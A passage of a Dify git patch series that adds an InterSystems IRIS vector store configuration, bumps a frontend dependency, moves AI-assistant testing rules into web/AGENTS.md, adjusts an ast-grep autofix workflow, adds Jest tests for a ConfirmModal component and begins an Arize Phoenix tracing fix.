IRIS_TEXT_INDEX=True, + IRIS_TEXT_INDEX_LANGUAGE="en", + ), + ) + + +def test_iris_vector(setup_mock_redis) -> None: + """Run all IRIS vector store tests. + + Args: + setup_mock_redis: Pytest fixture for mock Redis setup + """ + IrisVectorTest().run_all_tests() diff --git a/api/uv.lock b/api/uv.lock index 8cd49d057f..e6a6cf8ffc 100644 --- a/api/uv.lock +++ b/api/uv.lock @@ -1515,6 +1515,7 @@ vdb = [ { name = "clickzetta-connector-python" }, { name = "couchbase" }, { name = "elasticsearch" }, + { name = "intersystems-irispython" }, { name = "mo-vector" }, { name = "mysql-connector-python" }, { name = "opensearch-py" }, @@ -1711,6 +1712,7 @@ vdb = [ { name = "clickzetta-connector-python", specifier = ">=0.8.102" }, { name = "couchbase", specifier = "~=4.3.0" }, { name = "elasticsearch", specifier = "==8.14.0" }, + { name = "intersystems-irispython", specifier = ">=5.1.0" }, { name = "mo-vector", specifier = "~=0.1.13" }, { name = "mysql-connector-python", specifier = ">=9.3.0" }, { name = "opensearch-py", specifier = "==2.4.0" }, @@ -2918,6 +2920,18 @@ wheels = [ { url = "https://files.pythonhosted.org/packages/cb/b1/3846dd7f199d53cb17f49cba7e651e9ce294d8497c8c150530ed11865bb8/iniconfig-2.3.0-py3-none-any.whl", hash = "sha256:f631c04d2c48c52b84d0d0549c99ff3859c98df65b3101406327ecc7d53fbf12", size = 7484 }, ] +[[package]] +name = "intersystems-irispython" +version = "5.3.0" +source = { registry = "https://pypi.org/simple" } +wheels = [ + { url = "https://files.pythonhosted.org/packages/5d/56/16d93576b50408d97a5cbbd055d8da024d585e96a360e2adc95b41ae6284/intersystems_irispython-5.3.0-cp38.cp39.cp310.cp311.cp312.cp313-cp38.cp39.cp310.cp311.cp312.cp313-macosx_10_9_universal2.whl", hash = "sha256:59d3176a35867a55b1ab69a6b5c75438b460291bccb254c2d2f4173be08b6e55", size = 6594480, upload-time = "2025-10-09T20:47:27.629Z" }, + { url = "https://files.pythonhosted.org/packages/99/bc/19e144ee805ea6ee0df6342a711e722c84347c05a75b3bf040c5fbe19982/intersystems_irispython-5.3.0-cp38.cp39.cp310.cp311.cp312.cp313-cp38.cp39.cp310.cp311.cp312.cp313-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:56bccefd1997c25f9f9f6c4086214c18d4fdaac0a93319d4b21dd9a6c59c9e51", size = 14779928, upload-time = "2025-10-09T20:47:30.564Z" }, + { url = "https://files.pythonhosted.org/packages/e6/fb/59ba563a80b39e9450b4627b5696019aa831dce27dacc3831b8c1e669102/intersystems_irispython-5.3.0-cp38.cp39.cp310.cp311.cp312.cp313-cp38.cp39.cp310.cp311.cp312.cp313-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3e160adc0785c55bb64e4264b8e99075691a15b0afa5d8d529f1b4bac7e57b81", size = 14422035, upload-time = "2025-10-09T20:47:32.552Z" }, + { url = "https://files.pythonhosted.org/packages/c1/68/ade8ad43f0ed1e5fba60e1710fa5ddeb01285f031e465e8c006329072e63/intersystems_irispython-5.3.0-cp38.cp39.cp310.cp311.cp312.cp313-cp38.cp39.cp310.cp311.cp312.cp313-win32.whl", hash = "sha256:820f2c5729119e5173a5bf6d6ac2a41275c4f1ffba6af6c59ea313ecd8f499cc", size = 2824316, upload-time = "2025-10-09T20:47:28.998Z" }, + { url = "https://files.pythonhosted.org/packages/f4/03/cd45cb94e42c01dc525efebf3c562543a18ee55b67fde4022665ca672351/intersystems_irispython-5.3.0-cp38.cp39.cp310.cp311.cp312.cp313-cp38.cp39.cp310.cp311.cp312.cp313-win_amd64.whl", hash = "sha256:fc07ec24bc50b6f01573221cd7d86f2937549effe31c24af8db118e0131e340c", size = 3463297, upload-time = "2025-10-09T20:47:34.636Z" }, +] + [[package]] name = "intervaltree" version = "3.1.0" diff --git a/docker/.env.example b/docker/.env.example index 04088b72a8..0227f75b70 100644 --- a/docker/.env.example +++ b/docker/.env.example @@ -518,7 +518,7 @@ SUPABASE_URL=your-server-url # ------------------------------ # The type of vector store to use. -# Supported values are `weaviate`, `oceanbase`, `qdrant`, `milvus`, `myscale`, `relyt`, `pgvector`, `pgvecto-rs`, `chroma`, `opensearch`, `oracle`, `tencent`, `elasticsearch`, `elasticsearch-ja`, `analyticdb`, `couchbase`, `vikingdb`, `opengauss`, `tablestore`,`vastbase`,`tidb`,`tidb_on_qdrant`,`baidu`,`lindorm`,`huawei_cloud`,`upstash`, `matrixone`, `clickzetta`, `alibabacloud_mysql`. +# Supported values are `weaviate`, `oceanbase`, `qdrant`, `milvus`, `myscale`, `relyt`, `pgvector`, `pgvecto-rs`, `chroma`, `opensearch`, `oracle`, `tencent`, `elasticsearch`, `elasticsearch-ja`, `analyticdb`, `couchbase`, `vikingdb`, `opengauss`, `tablestore`,`vastbase`,`tidb`,`tidb_on_qdrant`,`baidu`,`lindorm`,`huawei_cloud`,`upstash`, `matrixone`, `clickzetta`, `alibabacloud_mysql`, `iris`. VECTOR_STORE=weaviate # Prefix used to create collection name in vector database VECTOR_INDEX_NAME_PREFIX=Vector_index @@ -792,6 +792,21 @@ CLICKZETTA_ANALYZER_TYPE=chinese CLICKZETTA_ANALYZER_MODE=smart CLICKZETTA_VECTOR_DISTANCE_FUNCTION=cosine_distance +# InterSystems IRIS configuration, only available when VECTOR_STORE is `iris` +IRIS_HOST=iris +IRIS_SUPER_SERVER_PORT=1972 +IRIS_WEB_SERVER_PORT=52773 +IRIS_USER=_SYSTEM +IRIS_PASSWORD=Dify@1234 +IRIS_DATABASE=USER +IRIS_SCHEMA=dify +IRIS_CONNECTION_URL= +IRIS_MIN_CONNECTION=1 +IRIS_MAX_CONNECTION=3 +IRIS_TEXT_INDEX=true +IRIS_TEXT_INDEX_LANGUAGE=en +IRIS_TIMEZONE=UTC + # ------------------------------ # Knowledge Configuration # ------------------------------ diff --git a/docker/docker-compose-template.yaml b/docker/docker-compose-template.yaml index b12d06ca97..6ba3409288 100644 --- a/docker/docker-compose-template.yaml +++ b/docker/docker-compose-template.yaml @@ -648,6 +648,26 @@ services: CHROMA_SERVER_AUTHN_PROVIDER: ${CHROMA_SERVER_AUTHN_PROVIDER:-chromadb.auth.token_authn.TokenAuthenticationServerProvider} IS_PERSISTENT: ${CHROMA_IS_PERSISTENT:-TRUE} + # InterSystems IRIS vector database + iris: + image: containers.intersystems.com/intersystems/iris-community:2025.3 + profiles: + - iris + container_name: iris + restart: always + init: true + ports: + - "${IRIS_SUPER_SERVER_PORT:-1972}:1972" + - "${IRIS_WEB_SERVER_PORT:-52773}:52773" + volumes: + - ./volumes/iris:/opt/iris + - ./iris/iris-init.script:/iris-init.script + - ./iris/docker-entrypoint.sh:/custom-entrypoint.sh + entrypoint: ["/custom-entrypoint.sh"] + tty: true + environment: + TZ: ${IRIS_TIMEZONE:-UTC} + # Oracle vector database oracle: image: container-registry.oracle.com/database/free:latest diff --git a/docker/docker-compose.yaml b/docker/docker-compose.yaml index 825f0650c8..71c0a5e687 100644 --- a/docker/docker-compose.yaml +++ b/docker/docker-compose.yaml @@ -361,6 +361,19 @@ x-shared-env: &shared-api-worker-env CLICKZETTA_ANALYZER_TYPE: ${CLICKZETTA_ANALYZER_TYPE:-chinese} CLICKZETTA_ANALYZER_MODE: ${CLICKZETTA_ANALYZER_MODE:-smart} CLICKZETTA_VECTOR_DISTANCE_FUNCTION: ${CLICKZETTA_VECTOR_DISTANCE_FUNCTION:-cosine_distance} + IRIS_HOST: ${IRIS_HOST:-iris} + IRIS_SUPER_SERVER_PORT: ${IRIS_SUPER_SERVER_PORT:-1972} + IRIS_WEB_SERVER_PORT: ${IRIS_WEB_SERVER_PORT:-52773} + IRIS_USER: ${IRIS_USER:-_SYSTEM} + IRIS_PASSWORD: ${IRIS_PASSWORD:-Dify@1234} + IRIS_DATABASE: ${IRIS_DATABASE:-USER} + IRIS_SCHEMA: ${IRIS_SCHEMA:-dify} + IRIS_CONNECTION_URL: ${IRIS_CONNECTION_URL:-} + IRIS_MIN_CONNECTION: ${IRIS_MIN_CONNECTION:-1} + IRIS_MAX_CONNECTION: ${IRIS_MAX_CONNECTION:-3} + IRIS_TEXT_INDEX: ${IRIS_TEXT_INDEX:-true} + IRIS_TEXT_INDEX_LANGUAGE: ${IRIS_TEXT_INDEX_LANGUAGE:-en} + IRIS_TIMEZONE: ${IRIS_TIMEZONE:-UTC} UPLOAD_FILE_SIZE_LIMIT: ${UPLOAD_FILE_SIZE_LIMIT:-15} UPLOAD_FILE_BATCH_LIMIT: ${UPLOAD_FILE_BATCH_LIMIT:-5} UPLOAD_FILE_EXTENSION_BLACKLIST: ${UPLOAD_FILE_EXTENSION_BLACKLIST:-} @@ -1286,6 +1299,26 @@ services: CHROMA_SERVER_AUTHN_PROVIDER: ${CHROMA_SERVER_AUTHN_PROVIDER:-chromadb.auth.token_authn.TokenAuthenticationServerProvider} IS_PERSISTENT: ${CHROMA_IS_PERSISTENT:-TRUE} + # InterSystems IRIS vector database + iris: + image: containers.intersystems.com/intersystems/iris-community:2025.3 + profiles: + - iris + container_name: iris + restart: always + init: true + ports: + - "${IRIS_SUPER_SERVER_PORT:-1972}:1972" + - "${IRIS_WEB_SERVER_PORT:-52773}:52773" + volumes: + - ./volumes/iris:/opt/iris + - ./iris/iris-init.script:/iris-init.script + - ./iris/docker-entrypoint.sh:/custom-entrypoint.sh + entrypoint: ["/custom-entrypoint.sh"] + tty: true + environment: + TZ: ${IRIS_TIMEZONE:-UTC} + # Oracle vector database oracle: image: container-registry.oracle.com/database/free:latest diff --git a/docker/iris/docker-entrypoint.sh b/docker/iris/docker-entrypoint.sh new file mode 100755 index 0000000000..067bfa03e2 --- /dev/null +++ b/docker/iris/docker-entrypoint.sh @@ -0,0 +1,38 @@ +#!/bin/bash +set -e + +# IRIS configuration flag file +IRIS_CONFIG_DONE="/opt/iris/.iris-configured" + +# Function to configure IRIS +configure_iris() { + echo "Configuring IRIS for first-time setup..." + + # Wait for IRIS to be fully started + sleep 5 + + # Execute the initialization script + iris session IRIS < /iris-init.script + + # Mark configuration as done + touch "$IRIS_CONFIG_DONE" + + echo "IRIS configuration completed." +} + +# Start IRIS in background for initial configuration if not already configured +if [ ! -f "$IRIS_CONFIG_DONE" ]; then + echo "First-time IRIS setup detected. Starting IRIS for configuration..." + + # Start IRIS + iris start IRIS + + # Configure IRIS + configure_iris + + # Stop IRIS + iris stop IRIS quietly +fi + +# Run the original IRIS entrypoint +exec /iris-main "$@" diff --git a/docker/iris/iris-init.script b/docker/iris/iris-init.script new file mode 100644 index 0000000000..c41fcf4efb --- /dev/null +++ b/docker/iris/iris-init.script @@ -0,0 +1,11 @@ +// Switch to the %SYS namespace to modify system settings +set $namespace="%SYS" + +// Set predefined user passwords to never expire (default password: SYS) +Do ##class(Security.Users).UnExpireUserPasswords("*") + +// Change the default password  +Do $SYSTEM.Security.ChangePassword("_SYSTEM","Dify@1234") + +// Install the Japanese locale (default is English since the container is Ubuntu-based) +// Do ##class(Config.NLS.Locales).Install("jpuw") From 9d683fd34dc3e709edee9493bcb9b51d978b6fa9 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 15 Dec 2025 10:25:28 +0800 Subject: [PATCH 09/68] chore(deps): bump @hookform/resolvers from 3.10.0 to 5.2.2 in /web (#29442) Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> Co-authored-by: crazywoola <100913391+crazywoola@users.noreply.github.com> --- web/package.json | 2 +- web/pnpm-lock.yaml | 19 +++++++++++++------ 2 files changed, 14 insertions(+), 7 deletions(-) diff --git a/web/package.json b/web/package.json index 979ac340fd..a3a4391d1e 100644 --- a/web/package.json +++ b/web/package.json @@ -54,7 +54,7 @@ "@formatjs/intl-localematcher": "^0.5.10", "@headlessui/react": "2.2.1", "@heroicons/react": "^2.2.0", - "@hookform/resolvers": "^3.10.0", + "@hookform/resolvers": "^5.2.2", "@lexical/code": "^0.38.2", "@lexical/link": "^0.38.2", "@lexical/list": "^0.38.2", diff --git a/web/pnpm-lock.yaml b/web/pnpm-lock.yaml index 537a3507a1..ac671d8b98 100644 --- a/web/pnpm-lock.yaml +++ b/web/pnpm-lock.yaml @@ -80,8 +80,8 @@ importers: specifier: ^2.2.0 version: 2.2.0(react@19.2.3) '@hookform/resolvers': - specifier: ^3.10.0 - version: 3.10.0(react-hook-form@7.68.0(react@19.2.3)) + specifier: ^5.2.2 + version: 5.2.2(react-hook-form@7.68.0(react@19.2.3)) '@lexical/code': specifier: ^0.38.2 version: 0.38.2 @@ -1887,10 +1887,10 @@ packages: peerDependencies: react: '>= 16 || ^19.0.0-rc' - '@hookform/resolvers@3.10.0': - resolution: {integrity: sha512-79Dv+3mDF7i+2ajj7SkypSKHhl1cbln1OGavqrsF7p6mbUv11xpqpacPsGDCTRvCSjEEIez2ef1NveSVL3b0Ag==} + '@hookform/resolvers@5.2.2': + resolution: {integrity: sha512-A/IxlMLShx3KjV/HeTcTfaMxdwy690+L/ZADoeaTltLx+CVuzkeVIPuybK3jrRfw7YZnmdKsVVHAlEPIAEUNlA==} peerDependencies: - react-hook-form: ^7.0.0 + react-hook-form: ^7.55.0 '@humanfs/core@0.19.1': resolution: {integrity: sha512-5DyQ4+1JEUzejeK1JGICcideyfUbGixgS9jNgex5nqkW+cY7WZhxBigmieN5Qnw9ZosSNVC9KQKyb+GUaGyKUA==} @@ -3193,6 +3193,9 @@ packages: '@sinonjs/fake-timers@10.3.0': resolution: {integrity: sha512-V4BG07kuYSUkTCSBHG8G8TNhM+F19jXFWnQtzj+we8DrkpSBCee9Z3Ms8yiGer/dlmhe35/Xdgyo3/0rQKg7YA==} + '@standard-schema/utils@0.3.0': + resolution: {integrity: sha512-e7Mew686owMaPJVNNLs55PUvgz371nKgwsc4vxE49zsODpJEnxgxRo2y/OKrqueavXgZNMDVj3DdHFlaSAeU8g==} + '@storybook/addon-docs@9.1.13': resolution: {integrity: sha512-V1nCo7bfC3kQ5VNVq0VDcHsIhQf507m+BxMA5SIYiwdJHljH2BXpW2fL3FFn9gv9Wp57AEEzhm+wh4zANaJgkg==} peerDependencies: @@ -6889,6 +6892,7 @@ packages: next@15.5.9: resolution: {integrity: sha512-agNLK89seZEtC5zUHwtut0+tNrc0Xw4FT/Dg+B/VLEo9pAcS9rtTKpek3V6kVcVwsB2YlqMaHdfZL4eLEVYuCg==} engines: {node: ^18.18.0 || ^19.8.0 || >= 20.0.0} + deprecated: This version has a security vulnerability. Please upgrade to a patched version. See https://nextjs.org/blog/security-update-2025-12-11 for more details. hasBin: true peerDependencies: '@opentelemetry/api': ^1.1.0 @@ -10497,8 +10501,9 @@ snapshots: dependencies: react: 19.2.3 - '@hookform/resolvers@3.10.0(react-hook-form@7.68.0(react@19.2.3))': + '@hookform/resolvers@5.2.2(react-hook-form@7.68.0(react@19.2.3))': dependencies: + '@standard-schema/utils': 0.3.0 react-hook-form: 7.68.0(react@19.2.3) '@humanfs/core@0.19.1': {} @@ -11865,6 +11870,8 @@ snapshots: dependencies: '@sinonjs/commons': 3.0.1 + '@standard-schema/utils@0.3.0': {} + '@storybook/addon-docs@9.1.13(@types/react@19.2.7)(storybook@9.1.13(@testing-library/dom@10.4.1))': dependencies: '@mdx-js/react': 3.1.1(@types/react@19.2.7)(react@19.2.3) From d01f2f7436eaa636b5cf5bfaf66bb0dbcb880e4d Mon Sep 17 00:00:00 2001 From: yyh <92089059+lyzno1@users.noreply.github.com> Date: Mon, 15 Dec 2025 10:49:39 +0800 Subject: [PATCH 10/68] chore: add AGENTS.md for frontend (#29647) --- .github/copilot-instructions.md | 12 ------------ .github/workflows/autofix.yml | 11 ++++++----- .windsurf/rules/testing.md | 5 ----- .cursorrules => web/AGENTS.md | 2 -- 4 files changed, 6 insertions(+), 24 deletions(-) delete mode 100644 .github/copilot-instructions.md delete mode 100644 .windsurf/rules/testing.md rename .cursorrules => web/AGENTS.md (87%) diff --git a/.github/copilot-instructions.md b/.github/copilot-instructions.md deleted file mode 100644 index 53afcbda1e..0000000000 --- a/.github/copilot-instructions.md +++ /dev/null @@ -1,12 +0,0 @@ -# Copilot Instructions - -GitHub Copilot must follow the unified frontend testing requirements documented in `web/testing/testing.md`. - -Key reminders: - -- Generate tests using the mandated tech stack, naming, and code style (AAA pattern, `fireEvent`, descriptive test names, cleans up mocks). -- Cover rendering, prop combinations, and edge cases by default; extend coverage for hooks, routing, async flows, and domain-specific components when applicable. -- Target >95% line and branch coverage and 100% function/statement coverage. -- Apply the project's mocking conventions for i18n, toast notifications, and Next.js utilities. - -Any suggestions from Copilot that conflict with `web/testing/testing.md` should be revised before acceptance. diff --git a/.github/workflows/autofix.yml b/.github/workflows/autofix.yml index 7947382968..d7a58ce93d 100644 --- a/.github/workflows/autofix.yml +++ b/.github/workflows/autofix.yml @@ -36,10 +36,11 @@ jobs: - name: ast-grep run: | - uvx --from ast-grep-cli sg --pattern 'db.session.query($WHATEVER).filter($HERE)' --rewrite 'db.session.query($WHATEVER).where($HERE)' -l py --update-all - uvx --from ast-grep-cli sg --pattern 'session.query($WHATEVER).filter($HERE)' --rewrite 'session.query($WHATEVER).where($HERE)' -l py --update-all - uvx --from ast-grep-cli sg -p '$A = db.Column($$$B)' -r '$A = mapped_column($$$B)' -l py --update-all - uvx --from ast-grep-cli sg -p '$A : $T = db.Column($$$B)' -r '$A : $T = mapped_column($$$B)' -l py --update-all + # ast-grep exits 1 if no matches are found; allow idempotent runs. + uvx --from ast-grep-cli ast-grep --pattern 'db.session.query($WHATEVER).filter($HERE)' --rewrite 'db.session.query($WHATEVER).where($HERE)' -l py --update-all || true + uvx --from ast-grep-cli ast-grep --pattern 'session.query($WHATEVER).filter($HERE)' --rewrite 'session.query($WHATEVER).where($HERE)' -l py --update-all || true + uvx --from ast-grep-cli ast-grep -p '$A = db.Column($$$B)' -r '$A = mapped_column($$$B)' -l py --update-all || true + uvx --from ast-grep-cli ast-grep -p '$A : $T = db.Column($$$B)' -r '$A : $T = mapped_column($$$B)' -l py --update-all || true # Convert Optional[T] to T | None (ignoring quoted types) cat > /tmp/optional-rule.yml << 'EOF' id: convert-optional-to-union @@ -57,7 +58,7 @@ jobs: pattern: $T fix: $T | None EOF - uvx --from ast-grep-cli sg scan --inline-rules "$(cat /tmp/optional-rule.yml)" --update-all + uvx --from ast-grep-cli ast-grep scan . --inline-rules "$(cat /tmp/optional-rule.yml)" --update-all # Fix forward references that were incorrectly converted (Python doesn't support "Type" | None syntax) find . -name "*.py" -type f -exec sed -i.bak -E 's/"([^"]+)" \| None/Optional["\1"]/g; s/'"'"'([^'"'"']+)'"'"' \| None/Optional['"'"'\1'"'"']/g' {} \; find . -name "*.py.bak" -type f -delete diff --git a/.windsurf/rules/testing.md b/.windsurf/rules/testing.md deleted file mode 100644 index 64fec20cb8..0000000000 --- a/.windsurf/rules/testing.md +++ /dev/null @@ -1,5 +0,0 @@ -# Windsurf Testing Rules - -- Use `web/testing/testing.md` as the single source of truth for frontend automated testing. -- Honor every requirement in that document when generating or accepting tests. -- When proposing or saving tests, re-read that document and follow every requirement. diff --git a/.cursorrules b/web/AGENTS.md similarity index 87% rename from .cursorrules rename to web/AGENTS.md index cdfb8b17a3..70e251b738 100644 --- a/.cursorrules +++ b/web/AGENTS.md @@ -1,5 +1,3 @@ -# Cursor Rules for Dify Project - ## Automated Test Generation - Use `web/testing/testing.md` as the canonical instruction set for generating frontend automated tests. From 7ee7155fd5bfe441252a8da40b0b2eafd041dc35 Mon Sep 17 00:00:00 2001 From: yyh <92089059+lyzno1@users.noreply.github.com> Date: Mon, 15 Dec 2025 11:14:38 +0800 Subject: [PATCH 11/68] test: add comprehensive Jest tests for ConfirmModal component (#29627) Signed-off-by: yyh Co-authored-by: autofix-ci[bot] <114827586+autofix-ci[bot]@users.noreply.github.com> --- .../confirm-modal/index.spec.tsx | 292 ++++++++++++++++++ 1 file changed, 292 insertions(+) create mode 100644 web/app/components/tools/workflow-tool/confirm-modal/index.spec.tsx diff --git a/web/app/components/tools/workflow-tool/confirm-modal/index.spec.tsx b/web/app/components/tools/workflow-tool/confirm-modal/index.spec.tsx new file mode 100644 index 0000000000..37bc1539d7 --- /dev/null +++ b/web/app/components/tools/workflow-tool/confirm-modal/index.spec.tsx @@ -0,0 +1,292 @@ +import React from 'react' +import { act, render, screen, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import ConfirmModal from './index' + +// Mock external dependencies as per guidelines +jest.mock('react-i18next', () => ({ + useTranslation: () => ({ + t: (key: string) => key, + }), +})) + +// Test utilities +const defaultProps = { + show: true, + onClose: jest.fn(), + onConfirm: jest.fn(), +} + +const renderComponent = (props: Partial> = {}) => { + const mergedProps = { ...defaultProps, ...props } + return render() +} + +describe('ConfirmModal', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + // Rendering tests (REQUIRED) + describe('Rendering', () => { + it('should render without crashing', () => { + // Arrange & Act + renderComponent() + + // Assert + expect(screen.getByRole('dialog')).toBeInTheDocument() + }) + + it('should render when show prop is true', () => { + // Arrange & Act + renderComponent({ show: true }) + + // Assert + expect(screen.getByRole('dialog')).toBeInTheDocument() + }) + + it('should not render when show prop is false', () => { + // Arrange & Act + renderComponent({ show: false }) + + // Assert + expect(screen.queryByRole('dialog')).not.toBeInTheDocument() + }) + + it('should render warning icon with proper styling', () => { + // Arrange & Act + renderComponent() + + // Assert + const iconContainer = document.querySelector('.rounded-xl') + expect(iconContainer).toBeInTheDocument() + expect(iconContainer).toHaveClass('border-[0.5px]') + expect(iconContainer).toHaveClass('bg-background-section') + }) + + it('should render translated title and description', () => { + // Arrange & Act + renderComponent() + + // Assert + expect(screen.getByText('tools.createTool.confirmTitle')).toBeInTheDocument() + expect(screen.getByText('tools.createTool.confirmTip')).toBeInTheDocument() + }) + + it('should render action buttons with translated text', () => { + // Arrange & Act + renderComponent() + + // Assert + expect(screen.getByText('common.operation.cancel')).toBeInTheDocument() + expect(screen.getByText('common.operation.confirm')).toBeInTheDocument() + }) + }) + + // Props tests (REQUIRED) + describe('Props', () => { + it('should handle missing onConfirm prop gracefully', () => { + // Arrange & Act - Should not crash when onConfirm is undefined + expect(() => { + renderComponent({ onConfirm: undefined }) + }).not.toThrow() + + // Assert + expect(screen.getByRole('dialog')).toBeInTheDocument() + expect(screen.getByText('common.operation.confirm')).toBeInTheDocument() + }) + + it('should apply default styling and width constraints', () => { + // Arrange & Act + renderComponent() + + // Assert - Check for the dialog panel with modal content + // The real modal structure has nested divs, we need to find the one with our classes + const dialogContent = document.querySelector('.relative.rounded-2xl') + expect(dialogContent).toBeInTheDocument() + expect(dialogContent).toHaveClass('w-[600px]') + expect(dialogContent).toHaveClass('max-w-[600px]') + expect(dialogContent).toHaveClass('p-8') + }) + }) + + // User Interactions + describe('User Interactions', () => { + it('should call onClose when close button is clicked', async () => { + // Arrange + const user = userEvent.setup() + const onClose = jest.fn() + renderComponent({ onClose }) + + // Act - Find the close button and click it + const closeButton = document.querySelector('.cursor-pointer') + expect(closeButton).toBeInTheDocument() // Ensure the button is found before clicking + await user.click(closeButton!) + + // Assert + expect(onClose).toHaveBeenCalledTimes(1) + }) + + it('should call onClose when cancel button is clicked', async () => { + // Arrange + const user = userEvent.setup() + const onClose = jest.fn() + renderComponent({ onClose }) + + // Act + const cancelButton = screen.getByText('common.operation.cancel') + await user.click(cancelButton) + + // Assert + expect(onClose).toHaveBeenCalledTimes(1) + }) + + it('should call onConfirm when confirm button is clicked', async () => { + // Arrange + const user = userEvent.setup() + const onConfirm = jest.fn() + renderComponent({ onConfirm }) + + // Act + const confirmButton = screen.getByText('common.operation.confirm') + await user.click(confirmButton) + + // Assert + expect(onConfirm).toHaveBeenCalledTimes(1) + }) + + it('should not throw error when confirm button is clicked without onConfirm', async () => { + // Arrange + const user = userEvent.setup() + renderComponent({ onConfirm: undefined }) + const confirmButton = screen.getByText('common.operation.confirm') + + // Act & Assert - This will fail the test if user.click throws an unhandled error + await user.click(confirmButton) + }) + + it('should have correct button variants', () => { + // Arrange & Act + renderComponent() + + // Assert + const confirmButton = screen.getByText('common.operation.confirm') + expect(confirmButton).toHaveClass('btn-warning') + }) + }) + + // Edge Cases (REQUIRED) + describe('Edge Cases', () => { + it('should handle rapid show/hide toggling', async () => { + // Arrange + const { rerender } = renderComponent({ show: false }) + + // Assert - Initially not shown + expect(screen.queryByRole('dialog')).not.toBeInTheDocument() + + // Act - Show modal + await act(async () => { + rerender() + }) + + // Assert - Now shown + expect(screen.getByRole('dialog')).toBeInTheDocument() + + // Act - Hide modal again + await act(async () => { + rerender() + }) + + // Assert - Hidden again (wait for transition to complete) + await waitFor(() => { + expect(screen.queryByRole('dialog')).not.toBeInTheDocument() + }) + }) + + it('should handle multiple quick clicks on close button', async () => { + // Arrange + const user = userEvent.setup() + const onClose = jest.fn() + renderComponent({ onClose }) + + const closeButton = document.querySelector('.cursor-pointer') + expect(closeButton).toBeInTheDocument() // Ensure the button is found before clicking + + // Act + await user.click(closeButton!) + await user.click(closeButton!) + await user.click(closeButton!) + + // Assert + expect(onClose).toHaveBeenCalledTimes(3) + }) + + it('should handle multiple quick clicks on confirm button', async () => { + // Arrange + const user = userEvent.setup() + const onConfirm = jest.fn() + renderComponent({ onConfirm }) + + // Act + const confirmButton = screen.getByText('common.operation.confirm') + await user.click(confirmButton) + await user.click(confirmButton) + await user.click(confirmButton) + + // Assert + expect(onConfirm).toHaveBeenCalledTimes(3) + }) + + it('should handle multiple quick clicks on cancel button', async () => { + // Arrange + const user = userEvent.setup() + const onClose = jest.fn() + renderComponent({ onClose }) + + // Act - Click cancel button twice + const cancelButton = screen.getByText('common.operation.cancel') + await user.click(cancelButton) + await user.click(cancelButton) + + // Assert + expect(onClose).toHaveBeenCalledTimes(2) + }) + }) + + // Accessibility tests + describe('Accessibility', () => { + it('should have proper button roles', () => { + // Arrange & Act + renderComponent() + + // Assert + const buttons = screen.getAllByRole('button') + expect(buttons).toHaveLength(2) + expect(buttons[0]).toHaveTextContent('common.operation.cancel') + expect(buttons[1]).toHaveTextContent('common.operation.confirm') + }) + + it('should have proper text hierarchy', () => { + // Arrange & Act + renderComponent() + + // Assert + const title = screen.getByText('tools.createTool.confirmTitle') + expect(title).toBeInTheDocument() + + const description = screen.getByText('tools.createTool.confirmTip') + expect(description).toBeInTheDocument() + }) + + it('should have focusable interactive elements', () => { + // Arrange & Act + renderComponent() + + // Assert + const buttons = screen.getAllByRole('button') + buttons.forEach((button) => { + expect(button).toBeEnabled() + }) + }) + }) +}) From 02122907e53e2596050139b1a80331c570a3c1d8 Mon Sep 17 00:00:00 2001 From: Ali Saleh Date: Mon, 15 Dec 2025 08:15:18 +0500 Subject: [PATCH 12/68] fix(api): Populate Missing Attributes For Arize Phoenix Integration (#29526) --- .../arize_phoenix_trace.py | 402 +++++++++++------- 1 file changed, 260 insertions(+), 142 deletions(-) diff --git a/api/core/ops/arize_phoenix_trace/arize_phoenix_trace.py b/api/core/ops/arize_phoenix_trace/arize_phoenix_trace.py index 347992fa0d..a7b73e032e 100644 --- a/api/core/ops/arize_phoenix_trace/arize_phoenix_trace.py +++ b/api/core/ops/arize_phoenix_trace/arize_phoenix_trace.py @@ -6,7 +6,13 @@ from datetime import datetime, timedelta from typing import Any, Union, cast from urllib.parse import urlparse -from openinference.semconv.trace import OpenInferenceMimeTypeValues, OpenInferenceSpanKindValues, SpanAttributes +from openinference.semconv.trace import ( + MessageAttributes, + OpenInferenceMimeTypeValues, + OpenInferenceSpanKindValues, + SpanAttributes, + ToolCallAttributes, +) from opentelemetry.exporter.otlp.proto.grpc.trace_exporter import OTLPSpanExporter as GrpcOTLPSpanExporter from opentelemetry.exporter.otlp.proto.http.trace_exporter import OTLPSpanExporter as HttpOTLPSpanExporter from opentelemetry.sdk import trace as trace_sdk @@ -95,14 +101,14 @@ def setup_tracer(arize_phoenix_config: ArizeConfig | PhoenixConfig) -> tuple[tra def datetime_to_nanos(dt: datetime | None) -> int: - """Convert datetime to nanoseconds since epoch. If None, use current time.""" + """Convert datetime to nanoseconds since epoch for Arize/Phoenix.""" if dt is None: dt = datetime.now() return int(dt.timestamp() * 1_000_000_000) def error_to_string(error: Exception | str | None) -> str: - """Convert an error to a string with traceback information.""" + """Convert an error to a string with traceback information for Arize/Phoenix.""" error_message = "Empty Stack Trace" if error: if isinstance(error, Exception): @@ -114,7 +120,7 @@ def error_to_string(error: Exception | str | None) -> str: def set_span_status(current_span: Span, error: Exception | str | None = None): - """Set the status of the current span based on the presence of an error.""" + """Set the status of the current span based on the presence of an error for Arize/Phoenix.""" if error: error_string = error_to_string(error) current_span.set_status(Status(StatusCode.ERROR, error_string)) @@ -138,10 +144,17 @@ def set_span_status(current_span: Span, error: Exception | str | None = None): def safe_json_dumps(obj: Any) -> str: - """A convenience wrapper around `json.dumps` that ensures that any object can be safely encoded.""" + """A convenience wrapper to ensure that any object can be safely encoded for Arize/Phoenix.""" return json.dumps(obj, default=str, ensure_ascii=False) +def wrap_span_metadata(metadata, **kwargs): + """Add common metatada to all trace entity types for Arize/Phoenix.""" + metadata["created_from"] = "Dify" + metadata.update(kwargs) + return metadata + + class ArizePhoenixDataTrace(BaseTraceInstance): def __init__( self, @@ -183,16 +196,27 @@ class ArizePhoenixDataTrace(BaseTraceInstance): raise def workflow_trace(self, trace_info: WorkflowTraceInfo): - workflow_metadata = { - "workflow_run_id": trace_info.workflow_run_id or "", - "message_id": trace_info.message_id or "", - "workflow_app_log_id": trace_info.workflow_app_log_id or "", - "status": trace_info.workflow_run_status or "", - "status_message": trace_info.error or "", - "level": "ERROR" if 